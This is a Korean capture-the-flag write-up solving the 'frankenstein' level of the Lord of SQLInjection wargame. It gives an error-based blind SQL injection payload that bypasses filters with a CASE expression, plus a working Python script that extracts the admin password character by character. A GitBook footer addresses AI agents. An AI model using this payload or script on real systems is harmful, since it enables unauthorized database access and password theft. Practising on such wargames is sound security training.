> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-frankenstein.md).

# \[Lord Of SQLInjection] frankenstein

<figure><img src="https://blog.kakaocdn.net/dna/bPl2F5/btsNB5F9D1P/AAAAAAAAAAAAAAAAAAAAAB8zguDgrpm5A_oP4hdelwg-ep0I9Bcb268nylpAeUEw/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=bZTOhIdt3GYlhNO08ySGBZtLlqU%3D" alt="" height="324" width="688"><figcaption></figcaption></figure>

#### **코드 분석**

* union과 괄호를 쓸 수 없음
* 쿼리를 실행하고 에러가 발생하면 ‘error’를 출력
* admin의 pw값을 찾으면 문제가 풀림

#### **Exploit**

* 괄호가 필터링되기 때문에 주요한 함수를 쓸 수 없고, union을 적용할 수도 없다.
* case 문으로 우회를 한다.

```
[도메인 값]?pw=' or case when id='admin' and pw < 특정값 then 9e307*2 else 1 end%23
```

* when의 조건이 참이면 9e307\*2을 할당해 에러를 발생시킴
* 정확한 크기를 비교하기 위해서 hex 값을 이용해서 특정값을 넣어줘야한다.
* pw가 0x313233이라는 값이고 특정값이 0x31이면 pw가 더 크므로 에러를 발생시키지 않지만 특정값이 0x32이면 에러를 발생시킨다.

```
import requests
import string
sess = requests.session()
headers = {'Cookie': 'PHPSESSID=YOURSESSID'}
admin_password = '0x'
previous = ''
ascii_printable = string.printable

## get password
for i in range(1,9):
    for j in ascii_printable:
        print((hex(ord(j))))
        url = f"https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=' or case when id='admin' and pw < {admin_password+hex(ord(j))[2:]} then 9e307*2 else 1 end%23"
        res = sess.get(url, headers=headers)
        print(res.text)
        if('<br>error' in res.text):
            if previous == '':
                previous = j
            admin_password = admin_password+hex(ord(previous))[2:]
            print(admin_password)
            break
        previous = j

print("Admin Password is " ,bytes.fromhex(admin_password[2:]).decode('ASCII'))
```

<figure><img src="https://blog.kakaocdn.net/dna/zbK8x/btsNBCdbAG8/AAAAAAAAAAAAAAAAAAAAAFGVg9qNXuHpqYuNbY_ZQaZv4IpDlj8apMAalJHrXzf5/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=YKZR02B09km4nzx9kYPYwtcVCwk%3D" alt="" height="400" width="724"><figcaption></figcaption></figure>

<br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-frankenstein.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.